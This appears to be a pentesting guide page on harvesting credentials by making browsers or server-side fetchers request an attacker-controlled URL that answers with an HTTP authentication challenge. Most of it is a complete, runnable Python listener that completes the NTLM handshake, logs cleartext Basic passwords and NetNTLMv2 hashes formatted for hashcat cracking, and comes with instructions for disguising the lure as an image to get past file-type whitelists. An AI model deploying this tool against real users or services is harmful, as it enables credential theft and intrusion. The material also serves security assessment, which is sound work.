What is it again?
It is abusing HTTP authentication, the folder-level "this directory needs credentials" challenge a web server can issue, against web applications and client browsers: you make the target fetch a resource you control, answer that fetch with an authentication challenge, and collect whatever credentials are sent back. How you introduce the challenge depends on understanding where the application or browser can be made to fetch from you.
When can this attack be used?
Anywhere an application renders an external resource. Most commonly the resource is fetched by the client (the user's browser), but in some more advanced web applications the fetch is performed server side, by a reverse proxy or a parser that retrieves resources on behalf of the user, under the authority (and with the credentials) of the application itself.
Client side examples:
Referencing an image for a header graphic or a profile picture; in fact referencing anything from anywhere you can. Only a URL is needed, so this still works where the application whitelists file types: the reference can end in .png and your server can still answer the request with a challenge.
Server side examples:
Fetching a resource at the user's instruction (for example a URL the user supplies), whether or not the result is then presented to the user.
Any functionality that calls an external resource using the application's own account or permissions.
Note for Pentesters:
When on a web application assessment, if you find XXE, SSRF or in fact any 'external HTTP (or SMB?) interaction' in the application, it is always worth pointing the 'external' target at an authentication challenge; you will be surprised how many applications and clients hand over credentials to an 'off-domain' or untrusted-zone host when it asks for them.
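As an added example (not code from the original page), this is the listener you would point such an 'external' reference at: a small Python HTTP server that answers every request with a 401 carrying WWW-Authenticate challenges for NTLM and Basic, completes the NTLM Type 1/2/3 exchange, and decodes whatever comes back (cleartext credentials for Basic, a NetNTLMv2 line in hashcat -m 5600 format for NTLM). The realm name, the advertised domain name, the listen port and the constructed sample Type 3 message are assumptions chosen for the demo, not values from the page.

```python
"""Added example: a tiny authentication-challenge listener.
Every request gets 401 + WWW-Authenticate; whatever comes back in
Authorization is decoded (Basic -> cleartext, NTLM Type 3 -> NetNTLMv2 in
hashcat -m 5600 format). Realm, domain name and port are placeholders."""
import base64
import os
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer

REALM = "intranet"       # assumed: realm shown in the Basic prompt
TARGET_DOMAIN = "CORP"   # assumed: domain advertised in the NTLM challenge
NTLMSSP = b"NTLMSSP\x00"
# Unicode | NTLM | TargetTypeDomain | ExtendedSessionSecurity | TargetInfo
FLAGS = 0x00000001 | 0x00000200 | 0x00010000 | 0x00080000 | 0x00800000


def pack_buffer(data: bytes, offset: int) -> bytes:
    """NTLM security-buffer descriptor: (len, maxlen, offset)."""
    return struct.pack("<HHI", len(data), len(data), offset)


def read_buffer(msg: bytes, at: int) -> bytes:
    """Resolve the security-buffer descriptor stored at offset `at`."""
    length, _, offset = struct.unpack_from("<HHI", msg, at)
    return msg[offset:offset + length]


def ntlm_type2(challenge: bytes, domain: str = TARGET_DOMAIN) -> bytes:
    """CHALLENGE_MESSAGE answering the client's Type 1; carries our 8-byte challenge."""
    target = domain.encode("utf-16-le")
    # AV_PAIR list: MsvAvNbDomainName (id 2) followed by MsvAvEOL (id 0)
    info = struct.pack("<HH", 2, len(target)) + target + struct.pack("<HH", 0, 0)
    hdr = 48  # fixed part without the optional Version field
    return (NTLMSSP + struct.pack("<I", 2) + pack_buffer(target, hdr)
            + struct.pack("<I", FLAGS) + challenge + b"\x00" * 8
            + pack_buffer(info, hdr + len(target)) + target + info)


def type3_to_hashcat(msg: bytes, challenge: bytes) -> str:
    """AUTHENTICATE_MESSAGE -> 'user::domain:challenge:NTProofStr:blob' (mode 5600)."""
    nt_resp = read_buffer(msg, 20)          # NtChallengeResponse
    if len(nt_resp) <= 24:
        raise ValueError("NTLMv1 response; only NTLMv2 handled here")
    domain = read_buffer(msg, 28).decode("utf-16-le")
    user = read_buffer(msg, 36).decode("utf-16-le")
    return f"{user}::{domain}:{challenge.hex()}:{nt_resp[:16].hex()}:{nt_resp[16:].hex()}"


def handle_ntlm(msg: bytes, challenge: bytes) -> dict:
    """Step the NTLM handshake: Type 1 -> reply with Type 2; Type 3 -> loot."""
    if not msg.startswith(NTLMSSP):
        raise ValueError("not an NTLMSSP message")
    kind = struct.unpack_from("<I", msg, 8)[0]
    if kind == 1:
        return {"scheme": "NTLM", "type": 1, "reply": ntlm_type2(challenge)}
    if kind == 3:
        return {"scheme": "NTLM", "type": 3, "hash": type3_to_hashcat(msg, challenge)}
    raise ValueError(f"unexpected NTLM message type {kind}")


def decode_authorization(header: str, challenge: bytes) -> dict:
    """Classify the Authorization header a client sends after our 401."""
    scheme, _, b64 = header.partition(" ")
    if scheme not in ("Basic", "NTLM"):
        return {"scheme": scheme, "unsupported": True}
    raw = base64.b64decode(b64)
    if scheme == "Basic":
        user, _, password = raw.decode("utf-8", "replace").partition(":")
        return {"scheme": "Basic", "user": user, "password": password}
    return handle_ntlm(raw, challenge)


def sample_type3(user: str, domain: str, nt_proof: bytes, blob: bytes) -> bytes:
    """Constructed Type 3 shaped like a browser's (test input, not a capture)."""
    lm, nt = b"\x00" * 24, nt_proof + blob
    d, u = domain.encode("utf-16-le"), user.encode("utf-16-le")
    base = 64  # fixed part without Version/MIC
    offs = [base, base + len(lm), base + len(lm) + len(nt), base + len(lm) + len(nt) + len(d)]
    return (NTLMSSP + struct.pack("<I", 3)
            + pack_buffer(lm, offs[0]) + pack_buffer(nt, offs[1])
            + pack_buffer(d, offs[2]) + pack_buffer(u, offs[3])
            + pack_buffer(b"", 0) * 2 + struct.pack("<I", FLAGS)
            + lm + nt + d + u)


class ChallengeHandler(BaseHTTPRequestHandler):
    challenge = os.urandom(8)  # one challenge per process is enough for a demo

    def do_GET(self):
        auth = self.headers.get("Authorization")
        if auth:
            result = decode_authorization(auth, self.challenge)
            if result.get("type") == 1:  # continue the NTLM handshake
                self._send_401("NTLM " + base64.b64encode(result["reply"]).decode())
                return
            self.log_message("captured from %s: %s", self.client_address[0], result)
        # Offer both; browsers pick NTLM, most libraries fall back to Basic
        self._send_401("NTLM", f'Basic realm="{REALM}"')

    do_POST = do_GET

    def _send_401(self, *challenges: str):
        self.send_response(401)
        for c in challenges:
            self.send_header("WWW-Authenticate", c)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), ChallengeHandler).serve_forever()
```

Run it, then make the target reference http://<your host>:8080/anything.png (the path does not matter, which is why file-type whitelists do not help the defender). A Windows browser that places your host in its Intranet zone will typically complete the NTLM exchange without prompting; for other zones it prompts, which is the 'off-domain or untrusted zone' behaviour the note above is about. A server-side fetcher (SSRF, XXE, a URL-preview parser) answers with whatever credentials its HTTP library has been configured with, if any.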
Tools to assist: